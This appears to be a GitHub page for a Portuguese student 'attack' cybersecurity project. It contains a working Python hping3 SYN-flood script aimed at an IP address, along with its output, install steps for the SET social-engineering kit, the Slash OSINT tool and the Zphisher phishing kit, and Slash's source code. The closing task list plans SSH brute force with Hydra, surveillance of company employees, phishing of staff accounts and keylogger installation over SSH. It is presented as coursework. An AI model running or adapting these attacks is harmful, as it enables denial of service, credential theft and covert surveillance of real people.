-
Notifications
You must be signed in to change notification settings - Fork 3
Projeto Cyber Segurança (Ataque)
import os
import subprocess
target_ip = "192.168.3.200"
log_file = "/var/log/suricata/fast.log"
# Comando hping3
command = f"hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source {target_ip}"
# Abre o arquivo de log em modo de escrita e redireciona a saída do comando para o arquivo
with open(log_file, "w") as log:
subprocess.call(command, shell=True, stdout=log, stderr=log)
sudo tail -f /var/log/suricata/fast.log
hping in flood mode, no replies will be shown
--- 192.168.3.200 hping statistic ---
1100330 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
HPING 192.168.3.200 (wlp2s0 192.168.3.200): S set, 40 headers + 120 data bytes
O comando sudo python dos_attack.py está executando um script Python chamado dos_attack.py com privilégios de superusuário (root) usando o sudo. Vou explicar o que esse comando está fazendo:
sudo: É um comando que permite que você execute outros comandos com privilégios de superusuário (root). O uso do sudo geralmente requer autenticação, então você precisa fornecer a senha do superusuário quando solicitado.
O script Python dos_attack.py parece estar usando a ferramenta hping3 para realizar um ataque de negação de serviço (DoS) em um endereço IP específico (192.168.1.113) e na porta 21 (FTP). O ataque envolve o envio de uma grande quantidade de pacotes SYN, que são usados para iniciar uma conexão TCP, mas sem esperar por uma resposta (flood mode). O hping3 está configurado para não exibir as respostas, conforme indicado pela mensagem "no replies will be shown".
É importante observar que a realização de um ataque de negação de serviço (DoS) em sistemas ou redes sem permissão explícita é ilegal e antiética. Além disso, pode causar interrupções nos serviços e causar problemas de rede. Esse tipo de atividade deve ser realizado apenas em um ambiente controlado e para fins de teste ou pesquisa legítima, com permissão apropriada. Certifique-se de entender as implicações legais e éticas antes de realizar esse tipo de teste ou ataque.
- Copyright ©️ 2020
- Written by: David Kennedy (ReL1K) @HackingDave
- Company: TrustedSec
The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE under readme/LICENSE for the licensing of SET.
- Linux
- Mac OS X (experimental)
pip3 install -r requirements.txt
python3 setup.py
=======
- Mac OS X
sudo apt install set -y
Kali Linux on Windows 10 is a minimal installation so it doesn't have any tools installed. You can easily install Social Engineer Toolkit on WSL/WSL2 without needing pip using the above command.
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 setup.py
sudo setoolkit
For a full document on how to use SET, visit the SET user manual.
For bug reports or enhancements, please open an issue here.
Slash é uma Ferramenta Osint Automatizada que permite OSINT pessoas pelo nome de usuário.
|__Checker |
| | |
| |__Social Media Profile Check (+187) |
| |__Forums Profile Check (+30) |
| |__Leak Check (Username,Email-Adress) |
| |
|__Search |
| | |
| |__Pastebin Paste Search |
| |__Github Commit Search |
| |
|__Extract Scrape |
| | |
| |__Phone Number Extract (From Bios,Raw Texts) |
| |__Mail Extractor (From Bios,Raw Texts) |
| |__Bio Scraper (Social Media) |
| |__Name Scraper (Social Media) |
| |__Location Scraper (Social Media) |
| |__Education Info Scraper (Social Media) |
| |__Personal Website Scraper (Social Media) |
|__|__________________________________________________________|
git clone https://github.com/theahmadov/slash
cd slash
pip install -r requirements.txt
python slash.py help
-
Username Syntax : python slash.py username
-
Mail Adress Syntax : python slash.py mail_adress
-
Examplo :
python slash.py theahmadov
import typer
from os import system
import time
from profiles import profiles
from forums import forums
from core import (
banner,
color,
symbol,
clear
)
from core.check import *
import threading
import argparse
from api.pastebin import search as pastesearch
from api.github import search as githubsearch
from api.extract import extract as extract
from api.leakcheck import check as leakcheck
def gethelp():
print(f"""{symbol.help_found}:
{color.redbg}Slash{color.reset} Includes :
{color.bold}paste{color.reset} search
{color.bold}social media{color.reset} search
{color.bold}forum{color.reset} search
{color.bold}leak check{color.reset}
Example :
{color.graybg}{color.red}{color.bold}${color.reset}{color.graybg} python slash.py Ahmadov{color.reset}
{color.graybg}{color.red}{color.bold}${color.reset}{color.graybg} python slash.py target@gmail.com{color.reset}""")
def _username(username):
print(f"{symbol.log} {symbol.slash} starting...")
print(f"{symbol.log} Username [{color.green}{color.bold}{username}{color.reset}] succesfully setted.")
threading.Thread(target=profiles.run,args=(username,)).start()
threading.Thread(target=forums.run,args=(username,)).start()
time.sleep(5)
try:threading.Thread(target=pastesearch,args=(username,)).start()
except:pass
try:threading.Thread(target=githubsearch,args=(username,)).start()
except:pass
def _mail(mail_adress):
print(f"{symbol.log} {symbol.slash} starting...")
print(f"{symbol.log} Mail adress [{color.green}{color.bold}{mail_adress}{color.reset}] succesfully setted.")
threading.Thread(target=leakcheck,args=(mail_adress,)).start()
time.sleep(3)
threading.Thread(target=pastesearch,args=(mail_adress,)).start()
threading.Thread(target=githubsearch,args=(mail_adress,)).start()
def _start(value : str):
if(value=="/" or value=="h" or value=='help'):
gethelp()
elif(len(extract.just.mail(value))!=0):
_mail(value)
elif(len(extract.just.phone(value))!=0):
pass
else:
_username(value)
if __name__ == "__main__":
clear()
print(banner.slash)
#_start()
typer.run(_start)
# By Ahmadov...
- Latest and updated login pages.
- Beginners friendly
- Multiple tunneling options
- Localhost
- Cloudflared
- LocalXpose
- Mask URL support
- Docker support
-
Just, Clone this repository -
git clone --depth=1 https://github.com/htr-tech/zphisher.git
-
Now go to cloned directory and run
zphisher.sh
-$ cd zphisher $ bash zphisher.sh
-
On first launch, It'll install the dependencies and that's it. Zphisher is installed.
You can easily install zphisher in Termux by using tur-repo
$ pkg install tur-repo
$ pkg install zphisher
$ zphisher
Termux discourages hacking .. So never discuss anything related to zphisher in any of the termux discussion groups. For more check : wiki
-
Download
.deb
files from the Latest Release -
If you are using termux then download the
*_termux.deb
-
Install the
.deb
file by executingapt install <your path to deb file>
Or
$ dpkg -i <your path to deb file> $ apt install -f
-
Docker Image Mirror:
-
DockerHub :
docker pull htrtech/zphisher
-
GHCR :
docker pull ghcr.io/htr-tech/zphisher:latest
-
DockerHub :
-
By using the wrapper script run-docker.sh
$ curl -LO https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh $ bash run-docker.sh
-
Temporary Container
docker run --rm -ti htrtech/zphisher
- Remember to mount the
auth
directory.
- Remember to mount the
Zphisher requires following programs to run properly -
git
curl
php
All the dependencies will be installed automatically when you run Zphisher for the first time.
- Apresentação do trabalho
- Colocar os dados da empresa no site da mesma
- Ativar os serviços ssh
- Apresentação do trabalho
- Apresentar as normas de segurança (ISO) para a empresa (em PDF)
- Analisar a vulnerabilidade do servidor e do site
- Utilizar para testar a vulnerabilidade de senha do ssh com o Hydra
- Em tempo real, utilizar um software para detectar ataque de força bruta do Hydra ao servidor ssh
- Gerar um relatório de ataque Dos com o SURICATA
- Utilizar o nmap para verificar se as portas estão fechadas e colocar isso ao relatório
- Apresentação do trabalho
- Realizar ataque de força bruta com Hydra
- Realizar um ataque com o Hypher3 (Envio de pacotes em massa (Apenas 10 segundos são enviados mais de 100000 pacotes no ip do servidor ou da internet)) (Gravar um vídeo pois esse ataque é extremamente perigoso e não podemos comprometer com o ip da Estácio, fazer isso em outro local gravando um vídeo para mostrar esse poderoso ataque de Hacker)
- Vigiar funcionários da empresa com Slash
- Realizar ataque social ou Engenharia Social com setoolkit
- Ataque com Phisher ao e-mail da empresa, redes sociais de funcionários
- Colocar um arquivo de keylogger nos computadores da empresa, através do ip do servidor com ssh